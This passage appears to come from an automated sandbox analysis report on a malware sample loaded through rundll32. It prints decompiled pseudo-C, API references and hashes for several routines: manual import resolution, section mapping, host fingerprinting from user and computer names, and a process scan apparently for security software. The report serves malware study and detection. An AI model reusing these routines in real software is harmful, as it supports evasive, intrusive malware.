0x702e1f48
0x702e1f0b
0x702e1f0f
0x702e1f18
0x702e1f1a
0x702e1f1e
0x702e1f40
0x702e1f40
0x00000000
0x702e1f40
0x702e1f20
0x702e1f25
0x702e1f2c
0x702e1f31
0x00000000
0x702e1f33
0x702e1f36
0x702e1f39
0x00000000
0x702e1f39

APIs

Part of subcall function 702E1262: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,702E1E88,74B063F0,00000000), ref: 702E1271
Part of subcall function 702E1262: GetVersion.KERNEL32 ref: 702E1280
Part of subcall function 702E1262: GetCurrentProcessId.KERNEL32 ref: 702E128F
Part of subcall function 702E1262: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 702E12A8

NtQuerySystemInformation.NTDLL(00000008,?,00000138,?), ref: 702E1EAB

Part of subcall function 702E1C3E: VirtualAlloc.KERNELBASE(00000000,702E1EC8,00003000,00000004,?,?,702E1EC8,00000001), ref: 702E1C94
Part of subcall function 702E1C3E: memcpy.NTDLL(?,?,702E1EC8,?,?,702E1EC8,00000001), ref: 702E1D2F
Part of subcall function 702E1C3E: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,702E1EC8,00000001), ref: 702E1D4A

Sleep.KERNELBASE(00000001,00000001), ref: 702E1ED0
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 702E1F18
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 702E1F36
WaitForSingleObject.KERNEL32(00000000,000000FF,702E15DD,?,00000000), ref: 702E1F68
GetExitCodeThread.KERNEL32(00000000,?), ref: 702E1F7C
CloseHandle.KERNEL32(00000000), ref: 702E1F83
GetLastError.KERNEL32(702E15DD,?,00000000), ref: 702E1F8B
GetLastError.KERNEL32 ref: 702E1F9E

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: ErrorLastLongNamePathProcessVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleInformationObjectOpenQuerySingleSleepSystemThreadVersionWaitmemcpy
String ID:
API String ID: 2016936029-0
Opcode ID: d6578b92cef6ea274933165624da68682c0ab809652447faf680be2b797cfd7a
Instruction ID: 579c0ce2d786a3b83f8d016c93604ae61c8147b0d4c9b09a549a4c8bf04eec56
Opcode Fuzzy Hash: d6578b92cef6ea274933165624da68682c0ab809652447faf680be2b797cfd7a
Instruction Fuzzy Hash: 5C318473A88302AFC711DF668C8DA6F77ECBB84711F9009BAF515C6250D734D9149BA2

Uniqueness

Uniqueness Score: -1.00%

Function 702E1983, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E702E1983(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L702E2220();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x702e41d0;
				_push(_t15 + 0x702e505e);
				_push(_t15 + 0x702e5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L702E221A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x702e41c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x702e1983
0x702e198c
0x702e1990
0x702e1996
0x702e199b
0x702e19a0
0x702e19a3
0x702e19a6
0x702e19ab
0x702e19ac
0x702e19af
0x702e19ba
0x702e19c1
0x702e19c5
0x702e19c7
0x702e19c8
0x702e19cb
0x702e19d0
0x702e19da
0x702e19dc
0x702e19dc
0x702e19f0
0x702e19f6
0x702e19fa
0x702e1a4a
0x702e19fc
0x702e1a05
0x702e1a1b
0x702e1a23
0x702e1a35
0x702e1a39
0x00000000
0x00000000
0x702e1a25
0x702e1a28
0x702e1a2d
0x702e1a2f
0x702e1a2f
0x702e1a10
0x702e1a12
0x702e1a3b
0x702e1a3c
0x702e1a3c
0x702e1a05
0x702e1a52

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,702E165F,0000000A,?,?), ref: 702E1990
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 702E19A6
_snwprintf.NTDLL ref: 702E19CB
CreateFileMappingW.KERNELBASE(000000FF,702E41C0,00000004,00000000,?,?), ref: 702E19F0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,702E165F,0000000A,?), ref: 702E1A07
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 702E1A1B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,702E165F,0000000A,?), ref: 702E1A33
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,702E165F,0000000A), ref: 702E1A3C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,702E165F,0000000A,?), ref: 702E1A44

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: b65798c5a64dc4241e01b0d013e3961028ac8a1b53a99d637c359572da62aa0a
Instruction ID: 6eb7c9caab6fb7972daa491d95b046706236a569d4e2009f9f9495a66d95a280
Opcode Fuzzy Hash: b65798c5a64dc4241e01b0d013e3961028ac8a1b53a99d637c359572da62aa0a
Instruction Fuzzy Hash: 61218EB3680108BFC711AFAACC8DFAE77ADEB48351F6040B9FA06D6250D6705954DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04444BDF, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E04444BDF(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x444a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E04441DCB( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x444a2d0 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x444a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E0444307F(_v8 + _v8, _t63);
							}
							HeapFree( *0x444a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x444a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E0444307F(_v8 + _v8, _t63);
						}
						HeapFree( *0x444a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x04444bdf
0x04444be7
0x04444bed
0x04444bf0
0x04444bf3
0x04444bf5
0x04444bfa
0x04444bfa
0x04444c00
0x04444c02
0x04444c0f
0x04444c70
0x04444c11
0x04444c16
0x04444c1c
0x04444c21
0x04444c2f
0x04444c33
0x04444c42
0x04444c49
0x04444c50
0x04444c50
0x04444c5b
0x04444c5b
0x04444c33
0x04444c21
0x04444c72
0x04444c78
0x04444c82
0x04444c84
0x04444c89
0x04444c98
0x04444c9c
0x04444ca7
0x04444cae
0x04444cb5
0x04444cb5
0x04444cc1
0x04444cc1
0x04444c9c
0x04444cca
0x04444ccc
0x04444ccf
0x04444cd1
0x04444cd4
0x04444cd7
0x04444ce1
0x04444ce5
0x04444ce9

APIs

GetUserNameW.ADVAPI32(00000000,044464B9), ref: 04444C16
RtlAllocateHeap.NTDLL(00000000,044464B9), ref: 04444C2D
GetUserNameW.ADVAPI32(00000000,044464B9), ref: 04444C3A
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,044464B9,?,?,?,?,?,04442582,?,00000001), ref: 04444C5B
GetComputerNameW.KERNEL32(00000000,00000000), ref: 04444C82
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04444C96
GetComputerNameW.KERNEL32(00000000,00000000), ref: 04444CA3
HeapFree.KERNEL32(00000000,00000000), ref: 04444CC1

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 575e52cf9a6b2156184b4656d2c96317a226507a796d508cd86ac1608616939b
Instruction ID: cbff0c274acd407f3e666bd86e338b5a911166ebbd98f92830f5cab50978277b
Opcode Fuzzy Hash: 575e52cf9a6b2156184b4656d2c96317a226507a796d508cd86ac1608616939b
Instruction Fuzzy Hash: 1231E675A00209AFFB11DFA9D981B6EF7F9FB88700F15456AE505E3250EB35EE00AB50

Uniqueness

Uniqueness Score: -1.00%

Function 044425E5, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E044425E5(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04441EF5(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E044430D1(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x044425f2
0x044425f3
0x044425f4
0x044425f5
0x044425f6
0x044425fa
0x04442601
0x04442610
0x04442613
0x04442616
0x0444261d
0x04442620
0x04442623
0x04442626
0x04442629
0x04442634
0x04442636
0x0444263f
0x04442647
0x04442649
0x0444265b
0x04442665
0x04442669
0x04442678
0x0444267c
0x04442685
0x0444268d
0x0444268d
0x0444268f
0x0444268f
0x04442697
0x0444269d
0x044426a1
0x044426a1
0x044426ac

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 0444262C
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 0444263F
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 0444265B

Part of subcall function 04441EF5: RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04442678
memcpy.NTDLL(00000000,00000000,0000001C), ref: 04442685
NtClose.NTDLL(00000000), ref: 04442697
NtClose.NTDLL(00000000), ref: 044426A1

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 2b7a68c35fa6a1fd0891dbc561c1087e3fa10db4b457eaa4decea14ac1be0ccd
Instruction ID: f90637c9452b2e80114e4d23ad46062bc95827ee46be665b65fdb0a562361d68
Opcode Fuzzy Hash: 2b7a68c35fa6a1fd0891dbc561c1087e3fa10db4b457eaa4decea14ac1be0ccd
Instruction Fuzzy Hash: 1A2116B6A00218BBEF11AFA5CC459DEBFBDEF88B50F104066F904B6150D7B19A449BA0

Uniqueness

Uniqueness Score: -1.00%

Function 70322400, Relevance: 9.5, APIs: 2, Strings: 3, Instructions: 748
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(7037E670,0000062B), ref: 70322569
GetEnvironmentVariableW.KERNEL32(703773BC,7037E670,0000062B), ref: 70322CA2

Strings

M22p, xrefs: 7032241C, 70322465
m7p, xrefs: 70322BEA
D, xrefs: 70322C65

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: DirectoryEnvironmentSystemVariable
String ID: D$M22p$m7p
API String ID: 774342593-2505578032
Opcode ID: d795f0b602637e5f8c69c304c597e20115b6203814cf4eb1dbe5dc22a1c7c834
Instruction ID: 0332e86147b2162d99f033b484b2eafc3af090d0e72eeafd15bf0c1ae06f6914
Opcode Fuzzy Hash: d795f0b602637e5f8c69c304c597e20115b6203814cf4eb1dbe5dc22a1c7c834
Instruction Fuzzy Hash: 92720AB29001058FC708CF6BCDD5B597BBEBB88318F34A529D409AB365DB317485CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04446244, Relevance: 7.5, APIs: 5, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04446244() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300); // executed
					while(_t8 != 0) {
						_t9 =  *0x444a2d4; // 0xefd5a8
						_t2 = _t9 + 0x444bde4; // 0x73617661
						if(StrStrIA( &_v264, _t2) != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x0444624f
0x04446254
0x04446259
0x0444625d
0x04446267
0x04446298
0x0444626e
0x04446273
0x04446289
0x044462a0
0x0444628b
0x04446293
0x00000000
0x04446293
0x044462a1
0x044462a2
0x00000000
0x044462a2
0x00000000
0x0444629c
0x044462a8
0x044462ad

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04446254
Process32First.KERNEL32(00000000,?), ref: 04446267
StrStrIA.SHLWAPI(?,73617661,00000000,00000000), ref: 04446281
Process32Next.KERNEL32(00000000,?), ref: 04446293
CloseHandle.KERNEL32(00000000), ref: 044462A2

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 5d654ec4c4245aacf4f5062dbe875b7648651be68ccb63860f0194d13e46b169
Instruction ID: 0a7e820f62a947ed0e72ceb9dbb3bdda471bd19d538973a21d3b483457a80f60
Opcode Fuzzy Hash: 5d654ec4c4245aacf4f5062dbe875b7648651be68ccb63860f0194d13e46b169
Instruction Fuzzy Hash: 73F096753000247BFF20BA66AC49EDFB7ACEBC6725F010063E945D2541EA68F95647A1

Uniqueness

Uniqueness Score: -1.00%

Function 702E12CE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E702E12CE(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E702E192C(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x702e12d7
0x702e12de
0x702e12df
0x702e12e0
0x702e12e1
0x702e12e2
0x702e12f3
0x702e12f7
0x702e130b
0x702e130e
0x702e1311
0x702e1318
0x702e131b
0x702e1322
0x702e1325
0x702e1328
0x702e132b
0x702e1330
0x702e136b
0x702e1332
0x702e1335
0x702e133b
0x702e1340
0x702e1344
0x702e1362
0x702e1346
0x702e134d
0x702e135b
0x702e135b
0x702e1344
0x702e1373

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 702E132B

Part of subcall function 702E192C: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 702E1959

memset.NTDLL ref: 702E134D

Strings

@, xrefs: 702E131B

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 90c013d232147c1135952abb9dd5e375259beb3d972f89906d059798f6fd04ad
Instruction ID: 01f6d867bbc896eb5ba71d5f8b04da97448435730ac2f94fb733d3d38cead381
Opcode Fuzzy Hash: 90c013d232147c1135952abb9dd5e375259beb3d972f89906d059798f6fd04ad
Instruction Fuzzy Hash: 4D2108B6E00209AFCB01CFA9C8849DEFBB9FB48354F5044B9E646F3610D734AA548F60

Uniqueness

Uniqueness Score: -1.00%

Function 702E1D62, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E702E1D62(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x702e41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x702e1d62
0x702e1d6b
0x702e1d70
0x702e1d76
0x702e1d7f
0x702e1d85
0x702e1d87
0x702e1d8a
0x702e1d8f
0x702e1d96
0x702e1d96
0x702e1d9a
0x702e1da2
0x702e1da5
0x00000000
0x00000000
0x702e1dab
0x702e1db5
0x702e1db7
0x702e1dba
0x702e1dbd
0x702e1dc1
0x702e1dc9
0x702e1dcb
0x702e1dce
0x702e1e36
0x702e1e36
0x702e1e3a
0x00000000
0x00000000
0x702e1dd3
0x702e1dd9
0x702e1ddb
0x702e1dee
0x702e1df1
0x702e1df1
0x702e1df1
0x702e1df5
0x702e1ddd
0x702e1ddd
0x702e1de5
0x702e1de7
0x00000000
0x00000000
0x00000000
0x00000000
0x702e1de7
0x702e1dd5
0x702e1dd5
0x702e1de9
0x702e1de9
0x702e1de9
0x702e1df8
0x702e1dfb
0x702e1dfd
0x702e1e04
0x702e1dff
0x702e1dff
0x702e1dff
0x702e1e0c
0x702e1e12
0x702e1e14
0x702e1e44
0x702e1e16
0x702e1e16
0x702e1e19
0x702e1e1b
0x702e1e23
0x702e1e23
0x702e1e28
0x702e1e2a
0x702e1e31
0x702e1e33
0x702e1e33
0x702e1e33
0x00000000
0x702e1e33
0x00000000
0x702e1e14
0x702e1dc3
0x702e1dc5
0x702e1dc7
0x00000000
0x00000000
0x702e1dc7
0x702e1e47
0x702e1e47
0x702e1e4e
0x702e1e53
0x00000000
0x00000000
0x702e1e59
0x702e1e64
0x00000000
0x702e1e64
0x702e1e5b
0x702e1e5b
0x702e1e61
0x00000000
0x702e1e61
0x702e1d8f
0x702e1e65
0x702e1e6a

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 702E1D9A
GetProcAddress.KERNEL32(?,00000000), ref: 702E1E0C

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 0ec0afa6731e41526f5957f9a07392a42860a726e9474416d814f028695e7629
Instruction ID: 8e633872c7c9d5ca990c5296bd3e0da11bbe40d77a87935d9628edb535ce44cb
Opcode Fuzzy Hash: 0ec0afa6731e41526f5957f9a07392a42860a726e9474416d814f028695e7629
Instruction Fuzzy Hash: 71313972B40206DBCB15CF9AC988AADB7F8FF08211BA440ADE806E7344E774DA50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 702E192C, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E702E192C(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x702e193e
0x702e1944
0x702e1952
0x702e1959
0x702e195e
0x702e1964
0x00000000
0x702e1965
0x00000000

APIs

NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 702E1959

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

